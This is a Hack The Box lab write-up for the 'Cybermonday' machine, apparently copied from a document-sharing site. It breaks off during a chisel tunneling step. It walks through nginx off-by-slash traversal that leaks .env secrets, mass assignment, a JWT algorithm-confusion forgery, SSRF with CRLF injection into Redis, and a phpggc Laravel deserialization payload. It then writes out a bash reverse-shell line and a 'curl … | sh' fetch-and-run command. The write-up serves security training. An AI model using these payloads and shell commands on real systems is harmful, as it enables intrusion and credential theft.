0% found this document useful (0 votes)
74 views49 pages

Cybermonday

Uploaded by

offsechouse
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
74 views49 pages

Cybermonday

Uploaded by

offsechouse
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 49

Cybermonday

20th November 2023 / Document No D23.100.256

Prepared By: dotguy

Machine Author: Tr1s0n

Difficulty: Hard

Synopsis
Cybermonday is a hard difficulty Linux machine that showcases vulnerabilities such as off-by-slash, mass
assignment, and Server-Side Request Forgery (SSRF). The initial foothold involves exploiting a mass
assignment vulnerability in the web application and executing Redis commands through SSRF using CRLF
injection. For lateral movement, the source code of the API is analyzed, followed by exploiting an LFI
vulnerability to retrieve the password for the user john . The privilege escalation to root is achieved by
leveraging SUDO privileges, allowing user john to build and run a docker container from any Docker
Compose file.

Skills required
Web Enumeration

Linux Fundamentals

Source code analysis

Redis

Skills learned
Cookie Manipulation

LFI
Exploiting SSRF

CRLF injection

Docker

Enumeration
Nmap
Let's run an Nmap scan to discover any open ports on the remote host.

nmap -p- --min-rate=1000 -sV 10.10.11.228

Starting Nmap 7.94 ( https://nmap.org )


Nmap scan report for 10.10.11.228
Host is up (0.080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.25.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

An initial Nmap scan reveals an SSH service on port 22 and an Nginx server on port 80 .

HTTP
Upon browsing to port 80 , we are redirected to the domain cybermonday.htb .
Let's add an entry for cybermonday.htb in our /etc/hosts file with the corresponding IP address to
resolve the domain name and allow us to access it in our browser.

echo "10.10.11.228 cybermonday.htb" | sudo tee -a /etc/hosts

Upon visiting cybermonday.htb in the browser, we are greeted with the homepage of the "Cybermonday"
web application, which seems like a e-commerce website.
It also has the option to log in at /login .
We can enumerate the cybermonday.htb domain to reveal any hidden sub-directories. One way to do this
is by using the wfuzz tool, which can be installed on Ubuntu using the following command:

sudo apt install wfuzz

This wordlist by SecLists can be utilised for our fuzzing objectives. We will be using the following flags with
wfuzz .

-c : to get colored output


-w : to specify the wordlist
-u : to specify the URL
--hl : to hide the result entries that have the specified number of lines in the repsonse

wfuzz -c -w /usr/share/wordlists/seclists/common.txt -u http://cybermonday.htb/FUZZ --hl


32

The above findings indicate the presence of only an assets directory on the website, among other
endpoints.

Let's explore the /dashboard endpoint, considering that it returns a HTTP 500 status code.
We encounter an error page resembling the one generated by the PHP framework Laravel , which we keep
in mind for further enumeration.

Now, let us sign-up at /signup to explore the application's functionality.


After user registration, we have access to the user dashboard.

Clicking on the "View profile" button, we see a page that shows us our profile information and also allows us
to edit it.

Foothold
Foothold
The nmap scan identified that the web application is using an Nginx server on port 80 . It can also be
verified by reading the HTTP response headers.

curl -I cybermonday.htb

HTTP/1.1 200 OK
Server: nginx/1.25.1
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

[* SNIP *]

When we encounter a Nginx web server, it is wise to check for the "off-by-slash" vulnerability. In Nginx, it is
possible to configure an alias to simplify the process of accessing specific files.

location /assets {
alias /home/user/assets/
}

With this configuration, we can send a request to /assets/img/image.jpg and the server will serve the file
/home/user/assets/img/image.jpg , due to the alias directive. However, due to the missing trailing / in
the location directive ( /assets instead of /assets/ ), issuing a request to /assets../.ssh/id_rsa
prompts the server to provide the file /home/user/assets/../.ssh/id_rsa , as the ../.ssh/id_rsa part is
considered a remainder and therefore appended to the alias.

As we saw in the fuzzing step, there is only the /assets directory on the server, so we can test off-by-slash
there.

The application responds with a status code of 403 , which signifies that the requested action is forbidden
or access is denied. As we do not get a status 404 , it potentially indicates the success of the attack.

Let's attempt to uncover files in the parent directory of the assets directory through fuzzing.

wfuzz -c -w /usr/share/SecLists/Discovery/Web-Content/quickhits.txt -u
http://cybermonday.htb/assets../FUZZ --hc 404

<...SNIP...>
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000074: 200 18 L 34 W 258 Ch "/.editorconfig"
000000070: 200 0 L 1 W 10 Ch "/.dockerignore"
000000081: 200 57 L 47 W 1081 Ch "/.env"
000000106: 301 7 L 11 W 169 Ch "/.git"
000000117: 200 10 L 16 W 152 Ch "/.gitattributes"
000000114: 301 7 L 11 W 169 Ch "/.git/logs/refs"
000000113: 200 1 L 9 W 147 Ch "/.git/logs/HEAD"
000000111: 200 75 L 326 W 11991 Ch "/.git/index"
000000108: 403 7 L 9 W 153 Ch "/.git/"
000000109: 200 5 L 13 W 92 Ch "/.git/config"
000000110: 200 1 L 2 W 23 Ch "/.git/HEAD"
000000112: 403 7 L 9 W 153 Ch "/.git/logs/"
000000119: 200 14 L 14 W 179 Ch "/.gitignore"
000000897: 200 64 L 126 W 1813 Ch "/composer.json"
000000898: 200 7875 L 14819 W 288024 Ch "/composer.lock"
000000954: 403 7 L 9 W 153 Ch "/config/"
000001060: 301 7 L 11 W 169 Ch "/database"
000001074: 403 7 L 9 W 153 Ch "/database/"
000001135: 200 25 L 56 W 435 Ch "/Dockerfile"
000001681: 200 18 L 43 W 473 Ch "/package.json"
000001901: 200 31 L 62 W 1175 Ch "/phpunit.xml"
000001965: 200 64 L 348 W 3958 Ch "/README.md"

The directories found by wfuzz indicate that when doing the path traversal we return to the root folder of
the application. Crucially, we discover the .env file, which typically contains secrets and other configuration
parameters passed as environment variables.

We download the file using cURL .

curl "http://cybermonday.htb/assets../.env"

APP_NAME=CyberMonday
APP_ENV=local
APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
APP_DEBUG=true
APP_URL=http://cybermonday.htb

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=db
DB_PORT=3306
DB_DATABASE=cybermonday
DB_USERNAME=root
DB_PASSWORD=root

BROADCAST_DRIVER=log
CACHE_DRIVER=file
Fuzzing also revealed the presence of a .git file, enabling us to clone the application to our local machine
using the git-dumper utility, which can be installed with the command pip3 install git-dumper .

git-dumper http://cybermonday.htb/assets../.git dump

Inspecting the composer.json file, we see that Laravel is at version 9.1.8 . This version has several utilities
for insecure deserialization, but we don’t have access to our session content to be able to exploit this
vulnerability.

While reviewing the routes of the application, we can see that the /update route uses the
ProfileController controller in the file routes/web.php .

Examining the update method within the ProfileController controller in the file
app/Http/Controllers/ProfileController.php , it becomes apparent that it saves the request body in the
$data variable and subsequently employs it for updating user data. This approach might be susceptible to
mass assignment, as a user could submit extra request data, thereby modifying details in their profile that
the web application does not anticipate to alter.
In Laravel, the $guarded property in a model specifies attributes that should not be mass assignable,
providing a security measure to control which model attributes can be updated using mass assignment.

The user model in the file app\Models\User.php shows that the $guarded property is set to protect only
the remember_token column. This implies that we can update any other information in our profile.
Within the database migrations in the file
database/migrations/2014_10_12_000000_create_users_table.php , it's evident that the user table
includes the isAdmin column.

We can modify its value to 1 , representing "True", thereby expanding our privileges within the application.

Exploiting Mass Assignment

To exploit the Mass Assignment vulnerability in the web application, let’s intercept the web request for
updating the profile information in the BurpSuite proxy.

http://cybermonday.htb/home/profile

Add the isAdmin parameter to the request body and set its value to 1 .
Upon forwarding the altered web request, it becomes apparent that a "Dashboard" button is now visible in
the website's navbar, indicating that our user has acquired administrator permissions.

Enumerating the dashboard reveals a page located at /dashboard/changelog displaying the WebApp
changelog. Within this page, there is a hyperlink labeled "Webhook" leading to http://webhooks-api-
beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 .

Let's add an entry for webhooks-api-beta.cybermonday.htb in our /etc/hosts file with the
corresponding IP address to be able to resolve the domain name.

echo "10.10.11.228 webhooks-api-beta.cybermonday.htb" | sudo tee -a /etc/hosts

Accessing webhooks-api-beta.cybermonday.htb reveals a list of API endpoints along with information


about each route's expected requests and corresponding parameters.
Let's also fuzz the webhooks-api-beta.cybermonday.htb domain to find any hidden endpoints or sub-
directories.

wfuzz -q -c -w /usr/share/wordlists/seclists/common.txt -u http://webhooks-api-


beta.cybermonday.htb/FUZZ --hc 404

<...SNIP...>
000000024: 200 20 L 56 W 602 Ch ".htaccess"
000002374: 200 10 L 17 W 447 Ch "jwks.json"

The scanning process reveals the file jwks.json . This file typically contains a JSON Web Key Set (JWKS),
which is used in authentication processes, providing a set of public keys that can be used to verify the
authenticity of JSON Web Tokens (JWTs) in secure communication systems.

curl http://webhooks-api-beta.cybermonday.htb/jwks.json
Let's test the various API endpoints. We will be using Postman for API testing in this writeup. If we try to visit
the /webhooks endpoint, we receive a reply which says that we are unauthorized.

Thus, let us register ourselves as a user to be able to use other functionalities of the API. This can be done
by sending a POST request to the /auth/register endpoint.

Next, let's log in by sending a POST request to the /auth/login .


Upon a successful login, the server responds with a JWT token in the x-access-token header.
Consequently, it is essential to include this header in our subsequent requests to maintain authentication.

Now we can access the /webhooks endpoint, which provides a listing of the existing webhooks.

When we try to access routes that create or delete webhooks, we get an unauthorized message even
though we have our session token header in place.
This implies that our user is lacking certain privileges. Let us analyze the JWT session token using this
website.

It is using the RS256 algorithm, which employs asymmetric cryptography, indicating the use of two keys for
signature operations. By successfully exploiting this, we can alter our JWT role, potentially elevating our
privileges. Various attacks on JWT tokens using RS256 include algorithm confusion, wherein the JWT's
algorithm is manipulated from RS256 to HS256. In this attack, the token is signed with the public key, but
the application mistakenly treats it as if the public key were a secret key used in symmetric cryptography.

Executing this attack requires acquiring the public key used by the API for JWT token signing. During our
fuzzing phase, we identified the jwks.json file, which stores these public keys. In an algorithm confusion
attack, attackers modify the alg header in the JWT from RS256 to HS256 and sign the token with the public
key. The server, misled by the alg header, uses this same public key as if it were a symmetric secret key to
verify the token.
curl http://webhooks-api-beta.cybermonday.htb/jwks.json

{
"keys": [
{
"kty": "RSA",
"use": "sig",
"alg": "RS256",
"n": "pvezvAKCOgxwsiyV6PRJfGMul-
WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDI
OPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-
qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82
BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w",
"e": "AQAB"
}
]
}

The server returns a JSON containing an array of keys, and inside it contains the JWKs. We can use this
website to transform JWK to PEM.
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApvezvAKCOgxwsiyV6PRJ
fGMul+WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP/8jJ7WA2gDa8oP3N2J8z
Fyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn7
97IlIYr6Wqfc6ZPn1nsEhOrwO+qSD4Q24FVYeUxsn7pJ0oOWHPD+qtC5q3BR2M/S
xBrxXh9vqcNBB3ZRRA0H0FDdV6Lp/8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhn
gysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh1
6wIDAQAB
-----END PUBLIC KEY-----

Store the public key in a file. Having the public key, we can utilize the jwt-tool utility to modify the
parameters of the JWT.

Let us clone the jwt-tool repository.

git clone https://github.com/ticarpi/jwt_tool.git


To run the attack, use the following command and follow through the interactive prompt to change the
value of the role parameter to admin .

python3 jwt_tool/jwt_tool.py <your-jwt> -S hs256 -k <public-key-file> -T

python3 jwt_tool.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkb3RndXkiLCJyb2xlIjoidXNlc
iJ9.Ubt_3Hnj8zcfHunbnznweczTBLGTCIvDu5HDM188ozOlfTX3gPrMA6-
Eu5g9MVAgOdB9k1lEz85N3h6_qk5ktSN9Wt6_0xuRX92K1X6sKIiqhy4p378mWosDzDr6sjzFGrIJwF3mwyZSg5pv6
h45YSjbFCks9LyaLD7VkNJZdFDfsYGK3wiRMWkLgXfgvpQ3x3KWSBiOK-
7WnZN6_XA6qBWnoRkTKzidUk23xsQ7QGJnhYhrSa5pzQJmJlwBDTweKUgzAKLWRX3UMme6SROQxdSoAnlVeCTel75N
JUvdr7I20vU-6eg_-eFldV2aJjx-AZHEc7JqBc8_SczQqWIuzw -S hs256 -k ../public.pem -T

<...SNIP...>
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================

Token header values:


[1] typ = "JWT"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 0

Token payload values:


[1] id = 2
[2] username = "dotguy"
[3] role = "user"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 3

Current value of role is: user


Please enter new value and hit ENTER
> admin
[1] id = 2
[2] username = "dotguy"
[3] role = "admin"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 0
jwttool_62700b77ef32858b0495145fb6d91948 - Tampered token - HMAC Signing:
[+]
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkb3RndXkiLCJyb2xlIjoiYWRta
W4ifQ.T2hoglH2xU_hXEPpy2WMv1ZXnI7avk53_IE5rSViVbs

Let us now use this modified JWT in the x-acccess-token header. We can now create a new webhook by
sending a POST request to /webhooks/create . We already know that this route expects 3 parameters:
name , description and action .

http://webhooks-api-beta.cybermonday.htb/webhooks/create

The response lists that their are two actions available for the web hook, namely "sendRequest" and
"createLogFile". Let us first create a webhook with the “sendRequest” action.
The API returns us a UUID to access this webhook. Let us now try to access this webhook.

The response states that the url parameter is missing in the request. Let us try to set up a Python HTTP
server locally and give our IP address in the url parameter to check whether the webhook is actually
executing the request.

Starting a Python HTTP server locally on port 8000 .

python3 -m http.server 8000

Send the request with our IP address in the url parameter.


We also need to define a HTTP method. Let us use GET and send the request.

We do receive a request on our local server.

python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


10.10.11.228 - - [22/Nov/2023 19:28:35] "GET / HTTP/1.1" 200 -

Earlier, we said mentioned insecure deserialization in Laravel, but to exploit this vulnerability we need
access to the contents of our session. In the .env file, we see that Laravel uses Redis to store its sessions.
curl "http://cybermonday.htb/assets../.env"

<...SNIP...>
BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DISK=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=redis
SESSION_LIFETIME=120

MEMCACHED_HOST=127.0.0.1

REDIS_HOST=redis
REDIS_PASSWORD=
REDIS_PORT=6379
REDIS_PREFIX=laravel_session:
CACHE_PREFIX=
<...SNIP...>

REDIS_BLACKLIST=flushall,flushdb

In case the API has access to Redis, we could initiate requests using the "gopher" protocol to execute
commands within Redis. However, it is crucial to verify whether the API supports requests using the gopher
protocol.

Let's test the webhook request with gopher protocol.

The response makes it clear that the API doesn't support the gopher protocol.

Further testing of the method parameter leads us to discover that this parameter is vulnerable to HTTP
smuggling attack via CRLF injection.

More information about this vulnerability can be found here.

We first start a Netcat listener on port 8000 .


nc -nlvp 8000

Then, we submit a request via the webhook, adding a \r\n sequence in the method parameter to
demonstrate the injection. The CRLF sequence here is key. It represents the carriage return ( \r ) and line
feed ( \n ) characters, which are used to start a new line in many text-based protocols, including HTTP.

GET\r\ninjected\r\n

After sending the malicious request, our listener receives the "injected" text after the GET method text.

nc -nvlp 8000

listening on [any] 8000 ...


connect to [10.10.14.27] from (UNKNOWN) [10.10.11.228] 38056
GET
injected
/ HTTP/1.1
Host: 10.10.14.27:8000
Accept: */*

The injected text "injected" appears on a new line, demonstrating that the CRLF sequence successfully
created a line break in the HTTP stream. This can potentially manipulate the behavior of the web server,
proxy, or other components in the HTTP communication chain.

With this vulnerability, we can modify the HTTP request to run commands inside Redis. We can refer to this
blog to better understand the curation of the CRLF payloads.

Let us try to run the flushall command on Redis with this payload to verify Redis command execution.

"*1\r\n$8\r\nflushall\r\n*1\r\n$4\r\nquit\r\n"
Ideally, successful execution of the payload should result in logging out of the application. However, upon
reloading the page, it is evident that the payload did not have the desired effect. This is attributed to the fact
that the .env file specifies the blacklisting of certain REDIS operations, namely flushall and flushdb .

REDIS_BLACKLIST=flushall,flushdb

With command execution in Redis, we can send an insecure deserialization payload in our session. For that,
we need to list the redis keys.

Let's use the following Python script to generate CRLF Redis command payloads.

#!/usr/bin/env python3
import urllib.parse
import sys
import json
def generate_payload(command):
command = command.split(" ")
payload = f"*{len(command)}\r\n"
for word in command:
payload += f"${len(word)}\r\n"
payload += f"{word}\r\n"
return payload
if __name__ == "__main__":
if(len(sys.argv) <= 1):
print(f"/usr/bin/python3 {str(sys.argv[0])} <cmd>")
exit(0)
cmd = str(sys.argv[1])
response = generate_payload(f"{cmd}")
response += generate_payload("quit")
output = json.dumps(response)
print(output)
The script takes two arguments: the first specifies the Redis server's IP address, and the second indicates
the Redis command to be executed. Let's try to list the Redis keys.

python3 generate_payload.py "keys *"

"*2\r\n$4\r\nkeys\r\n$1\r\n*\r\n*1\r\n$4\r\nquit\r\n"

We set the url parameter to redis:6379 , which we know from the previously discovered .env file. We
send the request with the generated payload in the method field.

It's observed that the application doesn't display the output of the executed command. Therefore, to
identify the key storing our session, we need to analyze how Laravel names keys in Redis. By default, Laravel
stores keys in Redis in the format: <redis_prefix>:<session_id> . To obtain the redis_prefix , we can
simply read the information from the .env file.

curl http://cybermonday.htb/assets../.env | grep REDIS

[** SNIP **]


REDIS_PREFIX=laravel_session:

We see that the Redis prefix is laravel_session . Now, we need the session ID. Laravel uses AES-256-CBC
encryption by default to encrypt the session ID. We can retrieve the session cookie by using the inspect
element feature of the browser and going into the storage tab.
Decode the base64 encoded cookie.

echo
"eyJpdiI6IlhXNWZJcit2RXRCUERrelBWU1VTTWc9PSIsInZhbHVlIjoiMDB4RGtIS2QzRTZQZEhpMmJsYlkxN1cxd
npaRXFTbGhvZjRQbzlwQ0NOd01oaHlrWE1kcHUxQUQ3WjhYbzA2eDlZNk93SEtkbW82SHJvNzhPdlRMSnNsSGU0SDh
Db2dRREI2L0tNbGZ3WkRkejIrMHUyMlEvS3p6OERwLzl3NzMiLCJtYWMiOiI3YmNjZjNjNGY5MmVhMzM3NzBjOTQ5Z
TUxZjE1MTk0MWNiYTc2MDgwYzk5OGY2OWIwNjE4MTgxZmVmYTJmM2FmIiwidGFnIjoiIn0=" | base64 -d

{"iv":"XW5fIr+vEtBPDkzPVSUSMg==","value":"00xDkHKd3E6PdHi2blbY17W1vzZEqSlhof4Po9pCCNwMhhyk
XMdpu1AD7Z8Xo06x9Y6OwHKdmo6Hro78OvTLJslHe4H8CogQDB6/KMlfwZDdz2+0u22Q/Kzz8Dp/9w73","mac":"7
bccf3c4f92ea33770c949e51f151941cba76080c998f69b0618181fefa2f3af","tag":""}

To decrypt this, we need the APP_KEY, which can be found in the .env file.

curl http://cybermonday.htb/assets../.env | grep APP_KEY

APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
[** SNIP **]

We can use the following PHP script to decrypt the session cookie and retrieve the session ID. It takes
command-line arguments for a session and an app key. It then decrypts an AES-256-CBC encrypted value
using the provided session data and app key, displaying the result.

<?php
if ($argc < 3) {
echo "Use php " . $argv[0] . " <session> <app_key>";
exit(1);
}
function decryptAesBase64($data, $key)
{
return openssl_decrypt(base64_decode($data["value"]), "AES-256-
CBC",base64_decode($key), OPENSSL_RAW_DATA, base64_decode($data["iv"]));
}
echo "\r\n";
echo decryptAesBase64(json_decode(base64_decode($argv[1]), true), $argv[2]) . PHP_EOL;

Execute the script, providing the session cookie and APP_KEY as arguments.
php decrypt.php
eyJpdiI6InhwcGNkTzBoRkhXSWZiaHBXallBcXc9PSIsInZhbHVlIjoiN3BHNk4yOHFKay90SmdHbmJ6QUV6SjVKRm
5xZzdJTHdwV1VMSi85WmxRZWdhdDdPQjFhY3RpS2RYS1l3d2NTR2tzRnhSYXMvQjlWblFLdTF2N3lZV3RYVDNPYWFM
OFEvNVRyVlM5NkFFa0lMZXV1K2MzQWJROUhLUVdldHVJZmciLCJtYWMiOiI5OTY2NWM3NGYzMzMzNWY3NzYxMTg5M2
YwOGYzYWUxYjk0NTc4NjZiNDAyNmU3MmFkMzU3M2E3ZmE3MjRlOWI2IiwidGFnIjoiIn0=
EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=

25c6a7ecd50b519b7758877cdc95726f29500d4c|m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8

By having the session ID and Redis prefix, we have the capability to input content into our session stored on
Redis. Thus, let's generate a payload to change the value for our session key.

python3 generate_payload.py "set laravel_session:DxtG33Khufei7bdfMXAyThXl6lbJucrJy7wXCh7


value_test"

"*3\r\n$3\r\nset\r\n$55\r\nlaravel_session:DxtG33Khufei7bdfMXAyThXl6lbJucrJy7wXCh7\r\n$10\
r\nvalue_test\r\n*1\r\n$4\r\nquit\r\n"

Send the request with the payload.

Upon attempting to access the web application, it becomes evident that Laravel produces an error message
during the unserialize process.
This implies that we have effectively modified the content of our session, allowing us to send a payload to
exploit insecure deserialization and achieve Remote Code Execution (RCE). We can use the phpggc utility to
generate a deserialization payload. First we clone the phpggc repository to our local machine.

git clone https://github.com/ambionics/phpggc.git;

Various payloads in phpggc contain null bytes, which can potentially hinder exploitation. After testing
multiple payloads, it can be determined that "Laravel/RCE10" is free of null bytes, making it suitable for our
purposes.

Let's now try to generate a deserialization payload to execute the id system command.

./phpggc/phpggc Laravel/RCE10 system id

O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:
{i:0;O:28:"Illuminate\Auth\RequestGuard":3:
{s:8:"callback";s:14:"call_user_func";s:7:"request";s:6:"system";s:8:"provider";s:2:"id";}
i:1;s:4:"user";}}

Let's now generate a deserialization payload to execute the id system command and insert the payload
into our session. We can store the generated payload in a temporary file, and out Python script
generate_payload.py can be used to set this payload in the Redis session key.

phpggc/phpggc Laravel/RCE10 system "id" > /tmp/payload; python3 generate_payload.py "set


laravel_session:m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8 $(cat /tmp/payload)"

"*3\r\n$3\r\nset\r\n$56\r\nlaravel_session:m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8\r\n$21
9\r\nO:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{s:9:\"condition\";a:2:
{i:0;O:28:\"Illuminate\\Auth\\RequestGuard\":3:
{s:8:\"callback\";s:14:\"call_user_func\";s:7:\"request\";s:6:\"system\";s:8:\"provider\";
s:2:\"id\";}i:1;s:4:\"user\";}}\r\n*1\r\n$4\r\nquit\r\n"
Send the request with the payload.

Upon refreshing the webpage, the output of the id command becomes visible, confirming the successful
execution of the command.

Let us now generate reverse shell bash payload and save it as index.html file.

echo "/bin/bash -c \"bash -i >& /dev/tcp/YOUR_IP/1337 0>&1\"" > index.html

Start a python web-server in the same directory as that of the index.html file.
python3 -m http.server 8001

We can use the curl utility to fetch the index.html file on the remote host and then pipe it to bash for
execution. Let us generate a deserialization payload for the same. We will use ${IFS} instead of a
whitespaces, because the generate_payload.py script is splits those characters, making whitespaces in the
payload impossible.

phpggc/phpggc Laravel/RCE10 system 'curl${IFS}<your-ip>:8001|sh' > /tmp/payload; python3


generate_payload.py "set <redis-key> $(cat /tmp/payload)"

Set up a Netcat listener on port 1337.

nc -nvlp 1337

Send the request and then reload the webpage. We successfully receive a reverse shell on out listener as
user www-data .

nc -nvlp 1337

listening on [any] 1337 ...


connect to [10.10.14.110] from (UNKNOWN) [10.10.11.228] 42944
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

www-data@070370e2cdc4:~/html/public$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Issuing the following sequence of commands will give us a proper TTY session:

script /dev/null -c bash


export TERM=xterm
Cntrl+Z
stty raw -echo && fg

Lateral Movement
The hostname ( 070370e2cdc4 ) indicates that we are within a Docker container. We can inspect the
filesystem, listing the files mounted in the /mnt directory. By examining the contents of the file
/mnt/.ssh/authorized_keys , it becomes apparent that there is a user named john on the remote server.
www-data@070370e2cdc4:~$ cat /mnt/.ssh/authorized_keys

ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCy9ETY9f4YGlxIufnXgnIZGcV4pdk94RHW9DExKFNo7iEvAnjMFnyqzGOJQZ
623wqvm2WS577WlLFYTGVe4gVkV2LJm8NISndp9DG9l1y62o1qpXkIkYCsP0p87zcQ5MPiXhhVmBR3XsOd9MqtZ6uq
RiALj00qGDAc+hlfeSRFo3epHrcwVxAd41vCU8uQiAtJYpFe5l6xw1VGtaLmDeyektJ7QM0ayUHi0dlxcD8rLX+Btn
q/xzuoRzXOpxfJEMm93g+tk3sagCkkfYgUEHp6YimLUqgDNNjIcgEpnoefR2XZ8EuLU+G/4aSNgd03+q0gqsnrzX3S
yc5eWYyC4wZ93f++EePHoPkObppZS597JiWMgQYqxylmNgNqxu/1mPrdjterYjQ26PmjJlfex6/BaJWTKvJeHAemqi
57VkcwCkBA9gRkHi9SLVhFlqJnesFBcgrgLDeG7lzLMseHHGjtb113KB0NXm49rEJKe6ML6exDucGHyHZKV9zgzN9u
Y4ntp2T86uTFWSq4U2VqLYgg6YjEFsthqDTYLtzHer/8smFqF6gbhsj7cudrWap/Dm88DDa3RW3NBvqwHS6E9mJNYl
NtjiTXyV2TNo9TEKchSoIncOxocQv0wcrxoxSjJx7lag9F13xUr/h6nzypKr5C8GGU+pCu70MieA8E23lWtw==
john@cybermonday

We can check the IP address assigned to the container.

www-data@070370e2cdc4:~$ hostname -I

172.18.0.7

Let us scan the entire 172.18.0.0/24 subnet range to identify any other containers currently active on the
network. For this, we can upload a static nmap binary to the machine to enumerate the internal hosts.

We download the nmap binary to our local machine.

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap

The, we serve it using a Python HTTP server.

python3 -m http.server 8001

We fetch it on the remote host and make the file executable.

curl YOUR_IP:8001/nmap -o /tmp/nmap


chmod +x /tmp/nmap

Finally, we scan the subnet using the -sn option.

/tmp/nmap -sn 172.18.0.0/24 --min-rate 1000

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-11-26 18:49 UTC


Cannot find nmap-payloads. UDP payloads are disabled.

Nmap scan report for 172.18.0.1


Host is up (0.0021s latency).
Nmap scan report for cybermonday_registry_1.cybermonday_default (172.18.0.2)
Host is up (0.0019s latency).
Nmap scan report for cybermonday_nginx_1.cybermonday_default (172.18.0.3)
Host is up (0.0016s latency).
Nmap scan report for cybermonday_redis_1.cybermonday_default (172.18.0.4)
Host is up (0.0013s latency).
Nmap scan report for cybermonday_db_1.cybermonday_default (172.18.0.5)
Host is up (0.0010s latency).
Nmap scan report for cybermonday_api_1.cybermonday_default (172.18.0.6)
Host is up (0.00074s latency).

Nmap scan report for 070370e2cdc4 (172.18.0.7)


Host is up (0.00038s latency).
Nmap done: 256 IP addresses (7 hosts up) scanned in 14.12 seconds

The scan shows that 7 hosts are up, including the cybermonday_api on 172.18.0.6 , to which we were
making requests previously. We see that the docker registry is also running on 172.18.0.2 .

A Docker registry is a centralized repository that stores and manages Docker images. It serves as a
distribution centre for Docker images, allowing users to share, distribute, and access containerized
applications. By default, a Docker registry listens on port 5000 .

With access to a docker registry, we can try to list the available docker images.

curl 172.18.0.2:5000/v2/_catalog

{"repositories":["cybermonday_api"]}

curl 172.18.0.2:5000/v2/cybermonday_api/tags/list

{"name":"cybermonday_api","tags":["latest"]}

The response indicates that there's an image "cybermonday_api" that has a single tag "latest".

We can try to port forward the registry to our local machine and download the image
cybermonday_api:latest for further analysis. This can be accomplished using the chisel utility.

We Download and serve the chisel binary using a Python HTTP server on our local machine.

wget
https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gzip -d chisel_1.8.1_linux_amd64.gz
mv chisel_1.8.1_linux_amd64 chisel
python3 -m http.server 8001

Then, we fetch it on the remote host and give the binary execution permissions.

curl YOUR_IP:8001/chisel -o /tmp/chisel


chmod +x /tmp/chisel

We start a local chisel server on the local machine on port 8000 .

./chisel server --reverse --port 8000


We run the following command on the remote server to connect to the chisel server on our local machine.
The R:5000:172.18.0.2:5000 argument specifies that the client should create a reverse tunnel, forwarding
incoming connections on localhost:5000 to the remote Docker registry at 172.18.0.2:5000 .

